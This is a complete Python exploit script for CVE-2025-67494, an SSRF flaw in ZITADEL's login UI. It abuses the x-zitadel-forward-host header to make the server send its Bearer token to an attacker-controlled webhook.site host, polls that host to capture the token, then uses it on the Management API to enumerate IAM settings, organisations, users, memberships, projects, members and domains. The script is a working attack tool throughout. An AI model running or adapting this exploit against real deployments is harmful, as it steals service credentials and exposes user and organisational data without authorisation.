#!/usr/bin/env python3 """ Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval """ import requests import json import argparse import time from urllib.parse import urlparse from pwn import log SEARCH_QUERY = {"query": {"offset": "0", "limit": 10}} class WebhookManager: def __init__(self): self.token = None self.url = None def create(self): """Create a webhook.site URL via API and return the token and URL""" try: response = requests.post("https://webhook.site/token", timeout=10) if response.status_code in [200, 201]: data = response.json() token = data.get('uuid') if token: self.token = token self.url = f"https://webhook.site/{token}" return token, self.url except Exception as e: log.error(f"Error creating webhook: {e}") return None, None def get_requests(self, timeout=60): """Poll webhook.site API to get requests""" if not self.token: return None url = f"https://webhook.site/token/{self.token}/requests" start_time = time.time() poll_interval = 5 last_check = 0 while time.time() - start_time < timeout: elapsed = time.time() - start_time try: response = requests.get(url, timeout=10) if response.status_code == 200: data = response.json() total = data.get('total', 0) if isinstance(data, dict) else 0 if total > last_check: log.info(f"Webhook received {total} request(s)...") last_check = total if data and 'data' in data and len(data['data']) > 0: return data['data'] remaining = int(timeout - elapsed) if remaining > 0 and remaining % 10 == 0 and elapsed > 5: log.info(f"Waiting for SSRF request... ({remaining}s remaining)") except Exception as e: log.error(f"Error polling webhook: {e}") if elapsed < timeout: time.sleep(poll_interval) return None def extract_bearer_token(self, requests_data): """Extract Bearer token from webhook requests""" if not requests_data: return None for req in requests_data: headers = req.get('headers', {}) if not headers: continue for key, value in headers.items(): if key.lower() == 'authorization': auth_header = value if isinstance(auth_header, list): auth_header = auth_header[0] if auth_header else "" if isinstance(auth_header, str) and auth_header.startswith('Bearer '): return auth_header[7:] return None class SSRFExploiter: def __init__(self, target_url): self.target_url = target_url def exploit(self, oob_host): log.info(f"Exploiting SSRF to {self.target_url}") log.info(f"OOB host: {oob_host}") url = f"{self.target_url}/ui/v2/login" headers = {"x-zitadel-forward-host": oob_host} try: response = requests.get(url, headers=headers, timeout=30) log.success(f"SSRF request sent (status: {response.status_code})") return True except Exception as e: log.error(f"Error during SSRF exploitation: {e}") return False def api_request(method="GET", endpoint="", error_msg=""): """Decorator for ZITADEL API requests""" def decorator(func): def wrapper(self, *args, **kwargs): url = f"{self.base_url}/management/v1/{endpoint}" headers = {"Authorization": f"Bearer {self.token}"} payload = SEARCH_QUERY if method == "POST" else None if payload: headers["Content-Type"] = "application/json" try: req_func = requests.get if method == "GET" else requests.post response = req_func(url, headers=headers, json=payload, timeout=10) if response.status_code == 200: return response.json() except Exception as e: if error_msg: log.error(f"{error_msg}: {e}") return None return wrapper return decorator class ZitadelAPI: def __init__(self, base_url, token): self.base_url = base_url self.token = token @api_request(method="GET", endpoint="iam", error_msg="Error retrieving IAM info") def get_iam_info(self): pass @api_request(method="GET", endpoint="orgs/me", error_msg="Error retrieving org info") def get_org_info(self): pass @api_request(method="POST", endpoint="users/_search", error_msg="Error listing users") def list_users(self): pass @api_request(method="POST", endpoint="projects/_search", error_msg="Error listing projects") def list_projects(self): pass @api_request(method="POST", endpoint="orgs/me/members/_search", error_msg="Error listing members") def list_org_members(self): pass @api_request(method="POST", endpoint="orgs/me/domains/_search", error_msg="Error listing domains") def list_org_domains(self): pass def get_user_memberships(self, user_id): return self._request(f"users/{user_id}/memberships/_search", "POST", SEARCH_QUERY, "Error retrieving memberships") def _request(self, endpoint, method="GET", data=None, error_msg=""): """Generic function to make API requests to ZITADEL Management API""" url = f"{self.base_url}/management/v1/{endpoint}" headers = {"Authorization": f"Bearer {self.token}"} if data: headers["Content-Type"] = "application/json" try: func = requests.get if method == "GET" else requests.post response = func(url, headers=headers, json=data, timeout=10) if response.status_code == 200: return response.json() except Exception as e: if error_msg: log.error(f"{error_msg}: {e}") return None class DataFormatter: @staticmethod def _format_list(data, key='result', formatter=None): if not data or key not in data or not data[key]: return None items = [formatter(item) for item in data[key] if formatter(item)] return "\n".join(items) if items else None @staticmethod def format_iam_info(data): if not data: return None gid = data.get('globalOrgId', 'N/A') pid = data.get('iamProjectId', 'N/A') did = data.get('defaultOrgId', 'N/A') return f"Global Org ID: {gid}\nIAM Project ID: {pid}\nDefault Org ID: {did}" @staticmethod def format_org_info(data): if not data or 'org' not in data: return None org = data['org'] oid = org.get('id', 'N/A') name = org.get('name', 'N/A') state = org.get('state', 'N/A') domain = org.get('primaryDomain', 'N/A') return f"ID: {oid}\nName: {name}\nState: {state}\nPrimary Domain: {domain}" @staticmethod def format_users(data): def fmt_user(user): user_type = "Machine" if 'machine' in user else "Human" username = user.get('userName', 'N/A') state = user.get('state', 'N/A') if 'human' in user and 'email' in user['human']: email = user['human']['email'].get('email', 'N/A') return f"{user_type}: {username} ({email}) - {state}" return f"{user_type}: {username} - {state}" return DataFormatter._format_list(data, 'result', fmt_user) @staticmethod def format_projects(data): def fmt_project(project): return f"{project.get('name', 'N/A')} (ID: {project.get('id', 'N/A')}) - {project.get('state', 'N/A')}" return DataFormatter._format_list(data, 'result', fmt_project) @staticmethod def format_members(data): def fmt_member(member): email = member.get('email', 'N/A') roles = ", ".join(member.get('roles', [])) return f"{email} - Roles: {roles}" return DataFormatter._format_list(data, 'result', fmt_member) @staticmethod def format_domains(data): def fmt_domain(domain): domain_name = domain.get('domainName', 'N/A') verified = "Verified" if domain.get('isVerified') else "Not Verified" primary = "Primary" if domain.get('isPrimary') else "" return f"{domain_name} - {verified} {primary}".strip() return DataFormatter._format_list(data, 'result', fmt_domain) @staticmethod def format_memberships(data): def fmt_membership(membership): org_name = membership.get('displayName', 'N/A') roles = ", ".join(membership.get('roles', [])) iam = "IAM" if membership.get('iam') else "Org" return f"{iam}: {org_name} - Roles: {roles}" return DataFormatter._format_list(data, 'result', fmt_membership) def print_info(title, data, formatter=None): if not data: return log.info(f"\n{'='*60}") log.info(f"{title}") log.info(f"{'='*60}") if formatter: formatted = formatter(data) if formatted: log.info(formatted) else: print(json.dumps(data, indent=2, ensure_ascii=False)) def main(): parser = argparse.ArgumentParser(description="Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval") parser.add_argument('-u', '--ui-url', required=True, help='ZITADEL Login UI URL (e.g., http://localhost:29000)') parser.add_argument('-a', '--api-url', help='ZITADEL Management API URL (e.g., http://localhost:28080). If not provided, will be auto-detected from UI URL') parser.add_argument('--timeout', type=int, default=60, help='Timeout in seconds (default: 60)') args = parser.parse_args() ui_url = args.ui_url if args.api_url: base_url = args.api_url else: parsed = urlparse(ui_url) base_url = f"{parsed.scheme}://{parsed.hostname}:28080" if parsed.port == 29000 else f"{parsed.scheme}://{parsed.netloc}" log.info("Starting CVE-2025-67494 exploit") log.info(f"UI URL: {ui_url}, API URL: {base_url}") webhook = WebhookManager() log.info("Creating webhook.site URL via API...") webhook_token, webhook_url = webhook.create() if not webhook_token: log.error("Failed to create webhook via API") oob_host = f"{webhook_token}.webhook.site" log.success(f"Webhook created: {webhook_url}") log.info(f"OOB host: {oob_host}") exploiter = SSRFExploiter(ui_url) log.info("Sending SSRF request...") exploiter.exploit(oob_host) log.info(f"Polling webhook for Bearer token (timeout: {args.timeout}s)...") requests_data = webhook.get_requests(args.timeout) if not requests_data: log.error(f"Timeout: No requests received within {args.timeout} seconds") token = webhook.extract_bearer_token(requests_data) if not token: log.error("Bearer token not found in webhook requests") log.success("Bearer token successfully retrieved!") log.info(f"Token: {token[:50]}...") log.info("Retrieving information via Management API...") api = ZitadelAPI(base_url, token) iam_info = api.get_iam_info() print_info("IAM Information", iam_info, DataFormatter.format_iam_info) org_info = api.get_org_info() print_info("Organization Information", org_info, DataFormatter.format_org_info) users = api.list_users() print_info("Users", users, DataFormatter.format_users) if users and 'result' in users and len(users['result']) > 0: first_user_id = users['result'][0]['id'] memberships = api.get_user_memberships(first_user_id) print_info(f"User Memberships (User ID: {first_user_id})", memberships, DataFormatter.format_memberships) projects = api.list_projects() print_info("Projects", projects, DataFormatter.format_projects) members = api.list_org_members() print_info("Organization Members", members, DataFormatter.format_members) domains = api.list_org_domains() print_info("Organization Domains", domains, DataFormatter.format_domains) log.success("Exploitation completed successfully!") if __name__ == "__main__": main()